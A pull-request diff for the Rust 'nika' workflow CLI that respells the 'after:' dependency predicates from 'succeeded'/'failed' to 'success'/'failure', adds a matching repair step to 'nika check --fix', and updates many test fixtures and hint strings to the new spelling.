### PR TITLE
feat(nika-vocab,nika-schema,nika-migrate,nika-cli): after: speaks success · failure (R5)

### DIFF
--- a/crates/nika-cli/src/verbs/check/mod.rs
+++ b/crates/nika-cli/src/verbs/check/mod.rs
@@ -825,7 +825,7 @@ mod tests {
     /// ASCII parity (`ok audited` · `>=`).
     #[test]
     fn clean_verdict_is_the_audited_card_line() {
-        let yaml = "nika: v1\nworkflow:\n  id: card\nmodel: mock/echo\ntasks:\n  a:\n    exec: { command: [\"echo\", \"hi\"] }\n  b:\n    after:\n      a: succeeded\n    exec: { command: [\"echo\", \"bye\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: card\nmodel: mock/echo\ntasks:\n  a:\n    exec: { command: [\"echo\", \"hi\"] }\n  b:\n    after:\n      a: success\n    exec: { command: [\"echo\", \"bye\"] }\n";
         let text = checked_text("audited-card.nika.yaml", yaml, false);
         assert!(
             text.contains("✔ audited · 2 tasks · 2 waves · permits none · est ≥$0.0000 · 1 hint"),
@@ -854,7 +854,7 @@ mod tests {
     fn plan_prints_wave_membership_with_verbs_and_targets() {
         let text = checked_text(
             "plan-membership.nika.yaml",
-            "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-5\ntasks:\n  think:\n    infer: { prompt: hi }\n  after:\n    after:\n      think: succeeded\n    exec:\n      command: [\"echo\", \"x\"]\n",
+            "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-5\ntasks:\n  think:\n    infer: { prompt: hi }\n  after:\n    after:\n      think: success\n    exec:\n      command: [\"echo\", \"x\"]\n",
             true,
         );
         assert!(text.contains("wave 1"), "membership renders: {text}");

--- a/crates/nika-cli/src/verbs/context.rs
+++ b/crates/nika-cli/src/verbs/context.rs
@@ -184,7 +184,7 @@ mod tests {
         // `when:` as a bare string = a conformance finding.
         std::fs::write(
             dir.join("flows/bad.nika.yaml"),
-            "nika: v1\nworkflow:\n  id: bad\ntasks:\n  a:\n    exec: { command: [\"echo\", \"x\"] }\n  b:\n    after:\n      a: succeeded\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
+            "nika: v1\nworkflow:\n  id: bad\ntasks:\n  a:\n    exec: { command: [\"echo\", \"x\"] }\n  b:\n    after:\n      a: success\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
         )
         .expect("write");
         // Hidden from the walk: dependency tree.

--- a/crates/nika-cli/src/verbs/explain.rs
+++ b/crates/nika-cli/src/verbs/explain.rs
@@ -23,9 +23,8 @@ const DOCS_ERRORS_URL: &str = "https://docs.nika.sh/errors";
 const DOCS_ERRORS_TEXT: &str = "docs.nika.sh/errors";
 
 /// The `nika explain <code>` verb. Accepts `NIKA-440`, `NIKA-DAG-002`,
-/// or the bare forms (`440` · `DAG-002`). The theme comes from the global
-/// `--color`/`--hyperlink` chain: on a TTY the doc-site reference rides an
-/// OSC-8 hyperlink; a piped explain keeps its exact bytes.
+/// or the bare forms (`440` · `DAG-002`). On a TTY the doc-site
+/// reference rides an OSC-8 hyperlink; a piped explain keeps its bytes.
 #[must_use]
 pub fn run(wire: &str, theme: Theme) -> VerbOutput {
     // The seam (`Theme::link` → `format::osc8`): text unchanged, escapes
@@ -124,8 +123,8 @@ fn retired_row(code: &str) -> Option<String> {
 }
 
 /// The ENGINE-side actionable fix for a spec code, when this binary
-/// ships one (the canon row states the FAILURE — the SSOT never carries
-/// per-CLI affordances, so the flag lives here with the flag itself).
+/// ships one (the canon row states the FAILURE — per-CLI affordances
+/// live here, never in the SSOT).
 fn cli_fix_hint(code: &str) -> Option<&'static str> {
     match code {
         // F4: the unresolved-vars class is fixable from the CLI.
@@ -152,12 +151,13 @@ fn cli_fix_hint(code: &str) -> Option<&'static str> {
             "`depends_on` is dead since W2 — a data read becomes a `with:` \
              binding (the binding IS the edge · the body reads \
              `${{ with.<name> }}`), a pure ordering becomes `after: \
-             {<task>: succeeded}` (or `terminal` for the always-pattern); \
+             {<task>: success}` (or `terminal` for the always-pattern); \
              `nika check --fix` migrates the provable cases",
         ),
         "NIKA-DAG-005" => Some(
-            "the `after:` predicate set is closed — pick one of \
-             `succeeded` · `failed` · `skipped` · `terminal`",
+            "the `after:` predicate set is closed — pick one of `success` · \
+             `failure` · `skipped` · `terminal` (`nika check --fix` respells \
+             the dead R5 spellings)",
         ),
         "NIKA-DAG-006" => Some(
             "the task is statically dead — an incoming edge's pass-set \

--- a/crates/nika-cli/src/verbs/explain_file.rs
+++ b/crates/nika-cli/src/verbs/explain_file.rs
@@ -592,7 +592,7 @@ mod tests {
         path
     }
 
-    const DIAMOND: &str = "nika: v1\nworkflow:\n  id: brief-factory\n  description: fetch, summarize twice, join\n\nmodel: mock/echo\n\ntasks:\n  root:\n    infer: { prompt: \"r\", max_tokens: 10 }\n  left:\n    after:\n      root: succeeded\n    infer: { prompt: \"l\", max_tokens: 10 }\n  right:\n    after:\n      root: succeeded\n    infer: { prompt: \"x\", max_tokens: 10 }\n  join:\n    after:\n      left: succeeded\n      right: succeeded\n    infer: { prompt: \"j\", max_tokens: 10 }\noutputs:\n  result: ${{ tasks.join.output }}\n";
+    const DIAMOND: &str = "nika: v1\nworkflow:\n  id: brief-factory\n  description: fetch, summarize twice, join\n\nmodel: mock/echo\n\ntasks:\n  root:\n    infer: { prompt: \"r\", max_tokens: 10 }\n  left:\n    after:\n      root: success\n    infer: { prompt: \"l\", max_tokens: 10 }\n  right:\n    after:\n      root: success\n    infer: { prompt: \"x\", max_tokens: 10 }\n  join:\n    after:\n      left: success\n      right: success\n    infer: { prompt: \"j\", max_tokens: 10 }\noutputs:\n  result: ${{ tasks.join.output }}\n";
 
     #[test]
     fn narrates_the_diamond_with_cost_and_handoff() {
@@ -682,7 +682,7 @@ mod tests {
         // must refuse to narrate and hand over to check (exit 2).
         let path = tmp(
             "dirty",
-            "nika: v1\nworkflow:\n  id: dirty\ntasks:\n  a:\n    exec: { command: [\"echo\", \"x\"] }\n  b:\n    after:\n      a: succeeded\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
+            "nika: v1\nworkflow:\n  id: dirty\ntasks:\n  a:\n    exec: { command: [\"echo\", \"x\"] }\n  b:\n    after:\n      a: success\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
         );
         let out = run(path.to_str().expect("utf8"), false, false);
         std::fs::remove_file(&path).ok();
@@ -767,7 +767,7 @@ mod tests {
     use nika_types::resource::Value;
     use std::time::Duration;
 
-    const FC: &str = "nika: v1\nworkflow:\n  id: fc-fix\n  description: forecast fixture\n\nmodel: mock/echo\n\ntasks:\n  fetch:\n    exec: { command: [\"echo\", \"x\"] }\n  think:\n    after:\n      fetch: succeeded\n    infer: { prompt: \"p\", max_tokens: 10 }\n";
+    const FC: &str = "nika: v1\nworkflow:\n  id: fc-fix\n  description: forecast fixture\n\nmodel: mock/echo\n\ntasks:\n  fetch:\n    exec: { command: [\"echo\", \"x\"] }\n  think:\n    after:\n      fetch: success\n    infer: { prompt: \"p\", max_tokens: 10 }\n";
 
     /// One completed fc-fix run body: fetch (exec) + think (infer),
     /// distinct durations, optional sha/model/extras.

--- a/crates/nika-cli/src/verbs/fix.rs
+++ b/crates/nika-cli/src/verbs/fix.rs
@@ -3,30 +3,20 @@
 
 //! `nika check --fix` — apply the machine-applicable renames and converge.
 //!
-//! The check ladder was DESIGNED for a repair loop: every rename finding
-//! carries a typed `suggestion` (the deterministic did-you-mean — never a
-//! guess past the threshold), and the code comments promise « the agent
-//! repair loop pattern-matches once and converges ». This verb is that
-//! loop, in-binary (the `cargo clippy --fix` / `eslint --fix` shape):
+//! The check ladder was DESIGNED for a repair loop (`cargo clippy --fix`
+//! shape): parse aborts at the first defect, so parse-level repairs land
+//! one per round; check-level typed suggestions (`nika:raed` → `nika:read`
+//! · `inpit` → `input`) splice in the same pass; re-parse + re-check
+//! until a round applies nothing (capped). The DEAD-FORM arm carries the
+//! flag-day migrations — W1 « the map » · W2 « the flow » · C2 « the
+//! E-split » · R5 « the predicates » (the old form is repairable, never
+//! executable).
 //!
-//! 1. parse — an [`UnknownField`](nika_schema::SchemaError) with a typed
-//!    suggestion (`promt:` → `prompt:`) is spliced and the round restarts
-//!    (parse aborts at the first defect, so parse-level repairs land one
-//!    per round);
-//! 2. check — every `unknown_tools[]` / `unknown_args[]` finding with a
-//!    typed suggestion (`nika:raed` → `nika:read` · `inpit` → `input` ·
-//!    `expr` → `expression`) is spliced in the same pass;
-//! 3. re-parse + re-check until a round applies nothing (capped).
-//!
-//! SAFETY over reach — a repair is applied ONLY when:
-//! - the suggestion is TYPED (never regex-scraped from a human message);
-//! - the old token occurs EXACTLY ONCE in the source as a whole word
-//!   (word-boundary guarded — ambiguity or a second occurrence skips the
-//!   repair with an honest note, the file is never guessed at);
-//! - the file re-parses/re-checks after (the loop converging IS the
-//!   proof; a repair that made things worse cannot survive the rounds).
-//!
-//! The file is rewritten only when at least one repair applied; the verb
+//! SAFETY over reach — a repair is applied ONLY when the suggestion is
+//! TYPED (never regex-scraped from a human message), the old token
+//! occurs EXACTLY ONCE as a whole word (ambiguity skips with an honest
+//! note), and the file re-parses after (convergence IS the proof). The
+//! file is rewritten only when at least one repair applied; the verb
 //! then renders the NORMAL check report of the final state — `--fix` is
 //! check plus a converging pen, not a different audit.
 
@@ -45,19 +35,16 @@ struct Repair {
     applied: bool,
 }
 
-/// Equivalence-or-stop diagnostics from the W2 migration (spec 03
-/// §`depends_on`) — rendered verbatim; the file is left untouched.
+/// Equivalence-or-stop diagnostics (W2) — rendered verbatim; untouched.
 struct StopNotes(Vec<String>);
 
-/// Rounds cap — each parse-level repair costs one round (parse aborts at
-/// the first defect), so this bounds pathological inputs, not real files.
+/// Rounds cap — parse aborts at the first defect, so each parse-level
+/// repair costs one round; this bounds pathological inputs.
 const MAX_ROUNDS: usize = 16;
 
-/// One round's DEAD-FORM arm — W1 « the map » · W2 « the flow » · C2
-/// « the E-split ». `Some(true)` = a migration applied (the round
-/// restarts, the re-parse is the proof) · `Some(false)` = STOP (the
-/// diagnostics name each case · never guess) · `None` = not a dead-form
-/// error (the caller's remaining path judges).
+/// One round's DEAD-FORM arm — W1 · W2 · C2 · R5. `Some(true)` =
+/// applied (the round restarts — the re-parse is the proof) ·
+/// `Some(false)` = STOP or nothing mechanical · `None` = not dead-form.
 fn apply_dead_form_arm(
     err: &SchemaError,
     source: &mut String,
@@ -74,7 +61,7 @@ fn apply_dead_form_arm(
         | SchemaError::W1TaskIdField { .. } => Some(apply_w1_map(source, repairs)),
         // W2 « the flow » dead form (PARSE-024) — the equivalence-or-
         // stop migration (spec 03 §depends_on): data → with: bindings ·
-        // provably-strict control → after: {d: succeeded} · every
+        // provably-strict control → after: {d: success} · every
         // ambiguous case STOPS with its candidates.
         SchemaError::W2DependsOnField { .. } => Some(apply_w2_flow(source, repairs, stop_notes)),
         // C2 « the E-split » dead forms (VALUES-001/002): the `vars:`
@@ -89,6 +76,10 @@ fn apply_dead_form_arm(
             ..
         } => Some(apply_esplit(source, repairs, stop_notes)),
         SchemaError::DeadValueForm { .. } => Some(false),
+        // R5 « the predicates » (DAG-005): the 1:1 respelling — a
+        // genuinely-unknown predicate (`passed`) has no mechanical
+        // repair (the codemod returns Clean · the teaching stands).
+        SchemaError::UnknownAfterPredicate { .. } => Some(apply_predicates(source, repairs)),
         _ => None,
     }
 }
@@ -147,7 +138,7 @@ pub fn run(path: &str, native_strict: bool, model: Option<&str>, theme: Theme) -
 
     let applied = repairs.iter().filter(|r| r.applied).count();
     if applied > 0
-        && let Err(e) = write_atomic(path, &source)
+        && let Err(e) = nika_migrate::repair::write_atomic(path, &source)
     {
         return VerbOutput::env(format!("cannot write {path}: {e}"));
     }
@@ -166,8 +157,7 @@ pub fn run(path: &str, native_strict: bool, model: Option<&str>, theme: Theme) -
     }
 }
 
-/// This round's typed renames from the check report (tools · args ·
-/// conformance refs) — sorted + deduped.
+/// This round's typed renames (tools · args · conformance refs), deduped.
 fn collect_typed_renames(
     report: &nika_schema::check::CheckReport,
 ) -> Vec<(String, String, &'static str)> {
@@ -292,6 +282,22 @@ fn apply_esplit(
     }
 }
 
+/// The R5 arm — the predicate respelling codemod. `true` = applied ·
+/// `false` = nothing to respell (the check teaching stands).
+fn apply_predicates(source: &mut String, repairs: &mut Vec<Repair>) -> bool {
+    let Some(migrated) = nika_migrate::predicates(source) else {
+        return false;
+    };
+    *source = migrated;
+    repairs.push(Repair {
+        old: "the dead predicate spellings (succeeded · failed)".to_owned(),
+        new: "success · failure in after: blocks".to_owned(),
+        kind: "r5-predicates",
+        applied: true,
+    });
+    true
+}
+
 /// The NIKA-VAR-021 hoist arm — `Some(true)` = applied (re-run the
 /// round) · `Some(false)` = STOP diagnostics captured (end the loop) ·
 /// `None` = no boundary finding this round.
@@ -322,8 +328,7 @@ fn try_w2_hoist(
     }
 }
 
-/// Render the per-repair lines + the closing verdict line (applied count
-/// or the honest nothing-applicable note).
+/// Per-repair lines + the closing verdict (count or the honest note).
 fn summary(repairs: &[Repair], applied: usize, theme: Theme) -> String {
     let mut out = String::new();
     for r in repairs {
@@ -371,13 +376,6 @@ fn summary(repairs: &[Repair], applied: usize, theme: Theme) -> String {
     out
 }
 
-/// Publish the healed source ATOMICALLY — the shared
-/// [`nika_migrate::repair::write_atomic`] door (the contract lives with
-/// the migrations crate since the C2 wall).
-fn write_atomic(path: &str, contents: &str) -> std::io::Result<()> {
-    nika_migrate::repair::write_atomic(path, contents)
-}
-
 /// Splice `old` → `new` when `old` occurs EXACTLY ONCE in `source` as a
 /// whole word — the byte surgery rides the shared
 /// [`nika_migrate::repair`] door; this wrapper keeps the CLI's repair
@@ -419,9 +417,7 @@ fn splice(
 }
 
 /// The env-shaped refusals for `--fix` combinations the loop cannot
-/// honor: stdin has no file to rewrite, `--json`'s `report_version`
-/// contract is a single immutable audit, several files would interleave
-/// rewrites with one summary.
+/// honor (stdin · `--json`'s immutable audit · multi-file).
 #[must_use]
 pub fn refuse(reason: &str) -> VerbOutput {
     VerbOutput {
@@ -533,7 +529,7 @@ mod tests {
         let path = dir.join("two-site.nika.yaml");
         std::fs::write(
             &path,
-            "nika: v1\nworkflow:\n  id: w\ninputs: { topic: { type: string, required: true } }\ntasks:\n  build:\n    invoke: { tool: \"nika:log\", args: { message: \"building ${{ inputs.topik }}\" } }\n  ship:\n    after:\n      buidl: succeeded\n    invoke: { tool: \"nika:log\", args: { message: \"shipping\" } }\noutputs:\n  made: ${{ tasks.buidl.output }}\n",
+            "nika: v1\nworkflow:\n  id: w\ninputs: { topic: { type: string, required: true } }\ntasks:\n  build:\n    invoke: { tool: \"nika:log\", args: { message: \"building ${{ inputs.topik }}\" } }\n  ship:\n    after:\n      buidl: success\n    invoke: { tool: \"nika:log\", args: { message: \"shipping\" } }\noutputs:\n  made: ${{ tasks.buidl.output }}\n",
         )
         .expect("write fixture");
         let out = run(
@@ -544,7 +540,7 @@ mod tests {
         );
         let healed = std::fs::read_to_string(&path).expect("re-read");
         assert!(
-            healed.contains("build: succeeded"),
+            healed.contains("build: success"),
             "control edge healed: {healed}"
         );
         assert!(
@@ -620,28 +616,60 @@ mod tests {
     }
 
     #[test]
-    fn write_atomic_error_path_cleans_its_temp() {
-        // The failure half of the atomic contract: renaming onto a path
-        // whose parent DIRECTORY vanished fails — the original (absent)
-        // target stays absent and the temp is swept, never leaked.
-        let dir = std::env::temp_dir().join(format!("nika-fix-atomic-{}", std::process::id()));
+    fn r5_dead_predicates_respell_and_converge_green() {
+        // The R5 flag-day repair loop: a pre-R5 file (after: succeeded ·
+        // after: failed across flow + block forms) is refused NIKA-DAG-005
+        // at parse — --fix respells both spellings in ONE pass and the
+        // final audit is clean (the codemod is whole-document, not
+        // one-per-round).
+        let dir = std::env::temp_dir().join(format!("nika-fix-r5-{}", std::process::id()));
         std::fs::create_dir_all(&dir).expect("tmpdir");
-        let gone = dir.join("gone");
-        std::fs::create_dir_all(&gone).expect("subdir");
-        let target = gone.join("wf.nika.yaml");
-        let target_str = target.to_str().expect("utf8").to_owned();
-        std::fs::remove_dir_all(&gone).expect("vanish parent");
-        assert!(
-            write_atomic(&target_str, "nika: v1\n").is_err(),
-            "no parent = publish fails"
+        let path = dir.join("prer5.nika.yaml");
+        std::fs::write(
+            &path,
+            "nika: v1\nworkflow:\n  id: w\ntasks:\n  build:\n    exec: { command: [\"true\"] }\n  test:\n    after: { build: succeeded }\n    exec: { command: [\"true\"] }\n  notify:\n    after:\n      test: failed\n    exec: { command: [\"true\"] }\n",
+        )
+        .expect("write fixture");
+        let out = run(
+            path.to_str().expect("utf8 path"),
+            false,
+            None,
+            Theme::new(false, true, false),
         );
-        // the temp would have lived in `gone/` — the whole dir is absent,
-        // and the sweep must not have recreated anything under `dir`.
-        let residue: Vec<_> = std::fs::read_dir(&dir)
-            .expect("readdir")
-            .filter_map(Result::ok)
-            .collect();
-        assert!(residue.is_empty(), "no residue: {residue:?}");
+        let healed = std::fs::read_to_string(&path).expect("re-read");
+        assert!(healed.contains("after: { build: success }"), "{healed}");
+        assert!(healed.contains("test: failure"), "{healed}");
+        assert!(
+            !healed.contains("succeeded") && !healed.contains(": failed"),
+            "{healed}"
+        );
+        assert!(out.text.contains("r5-predicates"), "{}", out.text);
+        assert_eq!(out.code, exit::OK, "clean after the respell: {}", out.text);
+        let _ = std::fs::remove_file(&path);
+    }
+
+    #[test]
+    fn unknown_predicate_has_no_mechanical_repair() {
+        // `passed` is NOT a dead spelling — the codemod stays out and the
+        // closed-set teaching renders; the file is never guessed at.
+        let dir = std::env::temp_dir().join(format!("nika-fix-r5noop-{}", std::process::id()));
+        std::fs::create_dir_all(&dir).expect("tmpdir");
+        let path = dir.join("unknown.nika.yaml");
+        let body = "nika: v1\nworkflow:\n  id: w\ntasks:\n  t:\n    exec: { command: [\"true\"] }\n  d:\n    after: { t: passed }\n    exec: { command: [\"true\"] }\n";
+        std::fs::write(&path, body).expect("write fixture");
+        let out = run(
+            path.to_str().expect("utf8 path"),
+            false,
+            None,
+            Theme::new(false, true, false),
+        );
+        assert_eq!(
+            std::fs::read_to_string(&path).expect("re-read"),
+            body,
+            "no rewrite without an applicable repair"
+        );
+        assert_ne!(out.code, exit::OK, "the unknown predicate still reds");
+        let _ = std::fs::remove_file(&path);
     }
 
     #[test]

--- a/crates/nika-cli/src/verbs/graph.rs
+++ b/crates/nika-cli/src/verbs/graph.rs
@@ -303,7 +303,7 @@ mod tests {
     /// (`skip_serializing` — no fake defaults).
     #[test]
     fn declared_policy_projects_and_undeclared_stays_absent() {
-        let yaml = "nika: v1\nworkflow:\n  id: policy\nmodel: mock/echo\ntasks:\n  guarded:\n    infer: { prompt: \"p\", max_tokens: 5 }\n    timeout: \"30s\"\n    retry:\n      max_attempts: 3\n    on_error:\n      skip: true\n    output:\n      summary: \".text\"\n      title: \".title\"\n  bare:\n    after:\n      guarded: succeeded\n    infer: { prompt: \"q\", max_tokens: 5 }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: policy\nmodel: mock/echo\ntasks:\n  guarded:\n    infer: { prompt: \"p\", max_tokens: 5 }\n    timeout: \"30s\"\n    retry:\n      max_attempts: 3\n    on_error:\n      skip: true\n    output:\n      summary: \".text\"\n      title: \".title\"\n  bare:\n    after:\n      guarded: success\n    infer: { prompt: \"q\", max_tokens: 5 }\n";
         let wf = nika_schema::parse(
             yaml,
             nika_schema::FileId::new(0),

--- a/crates/nika-cli/src/verbs/inspect.rs
+++ b/crates/nika-cli/src/verbs/inspect.rs
@@ -324,7 +324,7 @@ mod tests {
         // The diamond: width 2 ({left,right}) · pinch {root,join} ·
         // root blocks 3 — the report computed it, inspect must SAY it.
         let path = tmp(
-            "nika: v1\nworkflow:\n  id: anatomy\n\nmodel: mock/echo\n\ntasks:\n  root:\n    infer: { prompt: \"r\", max_tokens: 10 }\n  left:\n    after:\n      root: succeeded\n    infer: { prompt: \"l\", max_tokens: 10 }\n  right:\n    after:\n      root: succeeded\n    infer: { prompt: \"x\", max_tokens: 10 }\n  join:\n    after:\n      left: succeeded\n      right: succeeded\n    infer: { prompt: \"j\", max_tokens: 10 }\noutputs:\n  result: ${{ tasks.join.output }}\n",
+            "nika: v1\nworkflow:\n  id: anatomy\n\nmodel: mock/echo\n\ntasks:\n  root:\n    infer: { prompt: \"r\", max_tokens: 10 }\n  left:\n    after:\n      root: success\n    infer: { prompt: \"l\", max_tokens: 10 }\n  right:\n    after:\n      root: success\n    infer: { prompt: \"x\", max_tokens: 10 }\n  join:\n    after:\n      left: success\n      right: success\n    infer: { prompt: \"j\", max_tokens: 10 }\noutputs:\n  result: ${{ tasks.join.output }}\n",
         );
         let out = run(
             path.to_str().expect("utf-8 tmp path"),
@@ -408,7 +408,7 @@ mod tests {
     #[test]
     fn fan_out_groups_the_wave_and_truncates_the_witness() {
         let path = tmp(
-            "nika: v1\nworkflow:\n  id: fan5\ntasks:\n  root:\n    exec: { command: [\"echo\", \"r\"] }\n  c1:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"1\"] }\n  c2:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"2\"] }\n  c3:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"3\"] }\n  c4:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"4\"] }\n  c5:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"5\"] }\n",
+            "nika: v1\nworkflow:\n  id: fan5\ntasks:\n  root:\n    exec: { command: [\"echo\", \"r\"] }\n  c1:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"1\"] }\n  c2:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"2\"] }\n  c3:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"3\"] }\n  c4:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"4\"] }\n  c5:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"5\"] }\n",
         );
         let out = run(
             path.to_str().expect("utf-8 tmp path"),
@@ -455,7 +455,7 @@ mod tests {
     #[test]
     fn ascii_theme_draws_the_same_waves() {
         let path = tmp(
-            "nika: v1\nworkflow:\n  id: fanscii\ntasks:\n  root:\n    exec: { command: [\"echo\", \"r\"] }\n  c1:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"1\"] }\n  c2:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"2\"] }\n",
+            "nika: v1\nworkflow:\n  id: fanscii\ntasks:\n  root:\n    exec: { command: [\"echo\", \"r\"] }\n  c1:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"1\"] }\n  c2:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"2\"] }\n",
         );
         let out = run(
             path.to_str().expect("utf-8 tmp path"),
@@ -494,7 +494,7 @@ mod tests {
     #[test]
     fn width_four_has_no_ellipsis_and_blast_caps_at_three() {
         let path = tmp(
-            "nika: v1\nworkflow:\n  id: wide-diamond\ntasks:\n  root:\n    exec: { command: [\"echo\", \"r\"] }\n  m1:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"1\"] }\n  m2:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"2\"] }\n  m3:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"3\"] }\n  m4:\n    after:\n      root: succeeded\n    exec: { command: [\"echo\", \"4\"] }\n  join:\n    after:\n      m1: succeeded\n      m2: succeeded\n      m3: succeeded\n      m4: succeeded\n    exec: { command: [\"echo\", \"j\"] }\n",
+            "nika: v1\nworkflow:\n  id: wide-diamond\ntasks:\n  root:\n    exec: { command: [\"echo\", \"r\"] }\n  m1:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"1\"] }\n  m2:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"2\"] }\n  m3:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"3\"] }\n  m4:\n    after:\n      root: success\n    exec: { command: [\"echo\", \"4\"] }\n  join:\n    after:\n      m1: success\n      m2: success\n      m3: success\n      m4: success\n    exec: { command: [\"echo\", \"j\"] }\n",
         );
         let out = run(
             path.to_str().expect("utf-8 tmp path"),

--- a/crates/nika-cli/src/verbs/run/resume.rs
+++ b/crates/nika-cli/src/verbs/run/resume.rs
@@ -258,7 +258,7 @@ mod tests {
 
     #[test]
     fn from_removes_the_task_and_its_transitive_downstream() {
-        const WF: &str = "nika: v1\nworkflow:\n  id: t\ntasks:\n  a:\n    exec: { command: [\"true\"] }\n  b:\n    after:\n      a: succeeded\n    exec: { command: [\"true\"] }\n  c:\n    with:\n      prev: ${{ tasks.b.output }}\n    exec: { command: [\"echo\", \"${{ with.prev }}\"] }\n  solo:\n    exec: { command: [\"true\"] }\n";
+        const WF: &str = "nika: v1\nworkflow:\n  id: t\ntasks:\n  a:\n    exec: { command: [\"true\"] }\n  b:\n    after:\n      a: success\n    exec: { command: [\"true\"] }\n  c:\n    with:\n      prev: ${{ tasks.b.output }}\n    exec: { command: [\"echo\", \"${{ with.prev }}\"] }\n  solo:\n    exec: { command: [\"true\"] }\n";
         let wf = nika_schema::parse(
             WF,
             nika_schema::FileId::new(0),

--- a/crates/nika-cli/tests/bin_smoke.rs
+++ b/crates/nika-cli/tests/bin_smoke.rs
@@ -58,11 +58,11 @@ workflow:
 tasks:
   a:
     after:
-      b: succeeded
+      b: success
     exec: { command: ["true"] }
   b:
     after:
-      a: succeeded
+      a: success
     exec: { command: ["true"] }
 "#;
 
@@ -182,7 +182,7 @@ tasks:
     exec: { command: ["echo", "data"] }
   render_page:
     after:
-      fetch_data: succeeded
+      fetch_data: success
     exec: { command: ["echo", "page"] }
   compress:
     exec: { command: ["tar", "--version"] }
@@ -225,7 +225,7 @@ tasks:
     exec: { command: ["echo", "data"] }
   render_page:
     after:
-      fetch_data: succeeded
+      fetch_data: success
     exec: { command: ["echo", "page"] }
   compress:
     exec: { command: ["echo", "z"] }
@@ -1053,7 +1053,7 @@ fn explain_narrates_a_file_and_still_teaches_codes() {
     let wf = write_fixture(
         &dir,
         "story.nika.yaml",
-        "nika: v1\nworkflow:\n  id: smoke-story\n  description: a two-step story\n\nmodel: mock/echo\n\ntasks:\n  draft:\n    infer: { prompt: \"draft\", max_tokens: 10 }\n  polish:\n    after:\n      draft: succeeded\n    infer: { prompt: \"polish\", max_tokens: 10 }\noutputs:\n  result: ${{ tasks.polish.output }}\n",
+        "nika: v1\nworkflow:\n  id: smoke-story\n  description: a two-step story\n\nmodel: mock/echo\n\ntasks:\n  draft:\n    infer: { prompt: \"draft\", max_tokens: 10 }\n  polish:\n    after:\n      draft: success\n    infer: { prompt: \"polish\", max_tokens: 10 }\noutputs:\n  result: ${{ tasks.polish.output }}\n",
     );
     let out = bin()
         .arg("explain")
@@ -1269,7 +1269,7 @@ fn the_dag_draws_in_the_terminal() {
     let wf = write_fixture(
         &dir,
         "diamond.nika.yaml",
-        "nika: v1\nworkflow:\n  id: smoke-diamond\nmodel: mock/echo\ntasks:\n  fetch:\n    infer: { prompt: \"g\", max_tokens: 10 }\n  sum:\n    after:\n      fetch: succeeded\n    infer: { prompt: \"s\", max_tokens: 10 }\n  crit:\n    after:\n      fetch: succeeded\n    infer: { prompt: \"c\", max_tokens: 10 }\n  publish:\n    after:\n      sum: succeeded\n      crit: succeeded\n    infer: { prompt: \"p\", max_tokens: 10 }\n",
+        "nika: v1\nworkflow:\n  id: smoke-diamond\nmodel: mock/echo\ntasks:\n  fetch:\n    infer: { prompt: \"g\", max_tokens: 10 }\n  sum:\n    after:\n      fetch: success\n    infer: { prompt: \"s\", max_tokens: 10 }\n  crit:\n    after:\n      fetch: success\n    infer: { prompt: \"c\", max_tokens: 10 }\n  publish:\n    after:\n      sum: success\n      crit: success\n    infer: { prompt: \"p\", max_tokens: 10 }\n",
     );
     let out = bin()
         .arg("inspect")
@@ -1318,7 +1318,7 @@ fn context_aggregates_the_workspace_value_free() {
     write_fixture(
         &dir.join("flows"),
         "bad.nika.yaml",
-        "nika: v1\nworkflow:\n  id: smoke-bad\ntasks:\n  a:\n    exec: { command: [\"echo\", \"x\"] }\n  b:\n    after:\n      a: succeeded\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
+        "nika: v1\nworkflow:\n  id: smoke-bad\ntasks:\n  a:\n    exec: { command: [\"echo\", \"x\"] }\n  b:\n    after:\n      a: success\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
     );
     let out = bin()
         .args(["welcome", "--deep"])

--- a/crates/nika-cli/tests/e2e_pipeline.rs
+++ b/crates/nika-cli/tests/e2e_pipeline.rs
@@ -102,7 +102,7 @@ tasks:
     with:
       summary: ${{ tasks.think.output }}
     after:
-      extract: succeeded
+      extract: success
     invoke:
       tool: "nika:write"
       args:

--- a/crates/nika-cli/tests/forecast_e2e.rs
+++ b/crates/nika-cli/tests/forecast_e2e.rs
@@ -42,7 +42,7 @@ tasks:
 
   think:
     after:
-      probe: succeeded
+      probe: success
     infer:
       prompt: "summarize the probe"
       max_tokens: 32

--- a/crates/nika-cli/tests/gate_matrix_conformance.rs
+++ b/crates/nika-cli/tests/gate_matrix_conformance.rs
@@ -39,9 +39,8 @@ fn spec_dir() -> PathBuf {
 
 /// Observed terminal statuses from one real run (`run --json` event
 /// stream — the same projection reference/differential.py reads) plus
-/// the run's verdict bit and its full text (the R5 gap reads the
-/// refusal code out of it).
-fn run_observed(workflow: &Path) -> (std::collections::BTreeMap<String, String>, bool, String) {
+/// the run's verdict bit.
+fn run_observed(workflow: &Path) -> (std::collections::BTreeMap<String, String>, bool) {
     let out = Command::new(env!("CARGO_BIN_EXE_nika-cli"))
         .arg("run")
         .arg(workflow)
